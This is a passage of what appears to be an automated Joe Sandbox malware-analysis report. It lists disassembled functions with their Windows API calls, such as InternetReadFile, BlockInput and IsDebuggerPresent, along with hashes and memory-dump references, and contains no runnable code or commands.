                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 292994002-0
                                                                                                                                                                                                                                      • Opcode ID: 8c86b2de276cf471af5bf552731ef23ac22069363fc3833673063d5980e03ae2
                                                                                                                                                                                                                                      • Instruction ID: a7af0171223d913d1ca7928060428cd82e18a4113d65952ca2820b7c29e37108
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c86b2de276cf471af5bf552731ef23ac22069363fc3833673063d5980e03ae2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D121F3317042148FE7108F2ACC54B7A7BD6EF84318B19905DEA4AEB251D771DC02CB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E6462F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E64609,?,?,00EA3BD6,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E6464F
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00ED61E5
                                                                                                                                                                                                                                      • CoCreateInstance.OLE32(00F00CE0,00000000,00000001,00F00B50,?), ref: 00ED61FE
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00ED621C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                                                                                                                                      • String ID: .lnk
                                                                                                                                                                                                                                      • API String ID: 3769357847-24824748
                                                                                                                                                                                                                                      • Opcode ID: 81d1918408942969c06b42a32bd060bc4c648a7174a31ce823ea3a0e535b7bfd
                                                                                                                                                                                                                                      • Instruction ID: c63824805719dcd05b9e0f1da58077f953c3399b9139ee8a97d77bae6f21b2eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81d1918408942969c06b42a32bd060bc4c648a7174a31ce823ea3a0e535b7bfd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBD146716082119FC704DF25D884A2ABBF5FF89758F14585EF889AB361CB31EC46CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00EDD6D9
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00EDD73A
                                                                                                                                                                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00EDD74E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 234945975-0
                                                                                                                                                                                                                                      • Opcode ID: 367411021a2206bf69932b11e0b298e8bb0d27aaab31360eb3b5272e459d86d3
                                                                                                                                                                                                                                      • Instruction ID: cf52a72f2a6e9a3af46c05f8c7e8f20df6c8088d291f480583a769fe5a2197b1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 367411021a2206bf69932b11e0b298e8bb0d27aaab31360eb3b5272e459d86d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B21B0715083049FE7309F65CC89BAAB7FCEB40318F10545BE259B2251E770EE06DB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00E80ACB
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 00E80B96
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 00E80BB6
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 00E80BC0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                                                                                                      • Opcode ID: 5a30d488cc40b290b53a2b12665260b4a2411f000a44adc6de1f7f57bee64b97
                                                                                                                                                                                                                                      • Instruction ID: 3d318ac66a99b5066fa4e1ed7c086438bbcfb985f6b0336415f1801cfee03f0e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a30d488cc40b290b53a2b12665260b4a2411f000a44adc6de1f7f57bee64b97
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE311A75D452189BDB11EFA5D989BCDBBF8AF08304F10419AE50CBB250EB709A88CF45
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E80FC0,00F00E1C,00000017), ref: 00E80EA6
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(00F00E1C,?,00E80FC0,00F00E1C,00000017), ref: 00E80EAF
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409,?,00E80FC0,00F00E1C,00000017), ref: 00E80EBA
                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,?,00E80FC0,00F00E1C,00000017), ref: 00E80EC1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3231755760-0
                                                                                                                                                                                                                                      • Opcode ID: d44cc3eba62dd1085ed57ea0acc326e500b6408c3e772f8ee948366babc44c16
                                                                                                                                                                                                                                      • Instruction ID: 465ff697c03779bbe63cef66ba398c477ceb234b0bc978a1f5821ffd52ceb8f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d44cc3eba62dd1085ed57ea0acc326e500b6408c3e772f8ee948366babc44c16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19D0123200A209AFCA002BE2EC0CB7C3F2EEB88606F088000F30EA2021CB315408CB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00F046E0), ref: 00E9BE11
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F3221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00E9BE89
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F32270,000000FF,?,0000003F,00000000,?), ref: 00E9BEB6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$InformationTimeZone
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1904278450-0
                                                                                                                                                                                                                                      • Opcode ID: 869c8ceefea023f3376b8150f4b0fd393919f548104507af4322b4a85fbdcb7b
                                                                                                                                                                                                                                      • Instruction ID: 0e9363298f2e821be1bb233ca64eed25d4a6a49553535bb9b0622bc93ffa1391
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 869c8ceefea023f3376b8150f4b0fd393919f548104507af4322b4a85fbdcb7b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FC12971900208AFDF249F78EE41BAEBBFAEF41324F14655AE444BB291E7309E41CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00E9299A
                                                                                                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00E929A4
                                                                                                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00E929B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                                                                                                      • Opcode ID: 49b8527c9298ae8d68f55306263970ec74452658141eb5972b2ebf97bb508283
                                                                                                                                                                                                                                      • Instruction ID: 7f226d40a727b66f1248ed802027dc5fe4f1a78d17ae64742e025b585ee81756
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49b8527c9298ae8d68f55306263970ec74452658141eb5972b2ebf97bb508283
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8031D57494122CABCF21DF69DD8879CBBB8AF48310F5051DAE50CA6260E7309F858F55
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00ECEB0F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: mouse_event
                                                                                                                                                                                                                                      • String ID: DOWN
                                                                                                                                                                                                                                      • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                      • Opcode ID: eaf1bbe14ca856b63b2da63803b1375faf2765e98692d7d2311389c13c5350bd
                                                                                                                                                                                                                                      • Instruction ID: 9ba0080c05777163dc5c5540b3ff58c3052e06798278627e25c6a24e4899e3f6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaf1bbe14ca856b63b2da63803b1375faf2765e98692d7d2311389c13c5350bd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8E086E52DD7323DB91421157D06EF6038C8B62739711220AF814F41C0ED856D4661B9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00EBE358
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NameUser
                                                                                                                                                                                                                                      • String ID: X64
                                                                                                                                                                                                                                      • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                      • Opcode ID: b4cfa4157eac7f37591bc0676aca1ab306993989f2f65cb2fbf610be0b33e272
                                                                                                                                                                                                                                      • Instruction ID: 146270821efea20ee813bc3955f679ef7f13924dbb06eca9112bda1d2639a8b9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b4cfa4157eac7f37591bc0676aca1ab306993989f2f65cb2fbf610be0b33e272
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD0C9F480511DEACB80CB60DC88DDA77BCBB04314F104151F106B2140DB3095488B10
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00E80931
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2325560087-0
                                                                                                                                                                                                                                      • Opcode ID: 840ea0ffd17798bafe1115d37260d9b27101f69bd8acaff69c7209e610d47051
                                                                                                                                                                                                                                      • Instruction ID: 28edae85cc53ccf254f390c7271b9a048773cd659d1a60c1af71f279fd4b1d2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 840ea0ffd17798bafe1115d37260d9b27101f69bd8acaff69c7209e610d47051
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5141ACB19012098FEB68DF58D8C66AEBBF4FB88318F24946AC40DFB264D370D945CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • BlockInput.USER32(00000001), ref: 00EDF316
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BlockInput
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3456056419-0
                                                                                                                                                                                                                                      • Opcode ID: d0d380a91763ef8903ed80a31b3a9ff416468cfcf2323c331fb4a12e417d835b
                                                                                                                                                                                                                                      • Instruction ID: df82eb3b4eb29bc19b853f26ee5b00331dabf6e02008e2ecd05daec60070df45
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d0d380a91763ef8903ed80a31b3a9ff416468cfcf2323c331fb4a12e417d835b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAE04F312442049FC710EF5AE804A9ABBEDEF987A4F019427F84AE7351DB70E8418BA4
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00EF792F
                                                                                                                                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00EF7960
                                                                                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00EF796C
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00EF7986
                                                                                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00EF7995
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00EF79C0
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000010), ref: 00EF79C8
                                                                                                                                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00EF79CF
                                                                                                                                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 00EF79DE
                                                                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00EF79E5
                                                                                                                                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00EF7A30
                                                                                                                                                                                                                                      • FillRect.USER32(?,?,?), ref: 00EF7A62
                                                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EF7A84
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: GetSysColor.USER32(00000012), ref: 00EF7C21
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: SetTextColor.GDI32(?,?), ref: 00EF7C25
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: GetSysColorBrush.USER32(0000000F), ref: 00EF7C3B
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: GetSysColor.USER32(0000000F), ref: 00EF7C46
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: GetSysColor.USER32(00000011), ref: 00EF7C63
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EF7C71
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: SelectObject.GDI32(?,00000000), ref: 00EF7C82
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: SetBkColor.GDI32(?,00000000), ref: 00EF7C8B
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: SelectObject.GDI32(?,?), ref: 00EF7C98
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: InflateRect.USER32(?,000000FF,000000FF), ref: 00EF7CB7
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EF7CCE
                                                                                                                                                                                                                                        • Part of subcall function 00EF7BE8: GetWindowLongW.USER32(00000000,000000F0), ref: 00EF7CDB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4124339563-0
                                                                                                                                                                                                                                      • Opcode ID: 23569237c7f68adf529b9fb9cb59d587a653f7a35d9451b6ba1c8dd645bf1e65
                                                                                                                                                                                                                                      • Instruction ID: 0c734a62fa25ecc8ea999b73dee2a6f39e890ec9851814cd27cafe6da09fc426
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23569237c7f68adf529b9fb9cb59d587a653f7a35d9451b6ba1c8dd645bf1e65
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CA19C7200C305EFD7009F65DC48E7BBBAAFB89325F101A19FAA6A61E0D771D948CB51
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(?,?), ref: 00E79109
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 00EB7157
                                                                                                                                                                                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00EB7190
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00EB75D5
                                                                                                                                                                                                                                        • Part of subcall function 00E79257: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E78EDD,?,00000000,?,?,?,?,00E78EAF,00000000,?), ref: 00E792BA
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001053), ref: 00EB7611
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00EB7628
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00EB763E
                                                                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(00000000,?), ref: 00EB7649
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
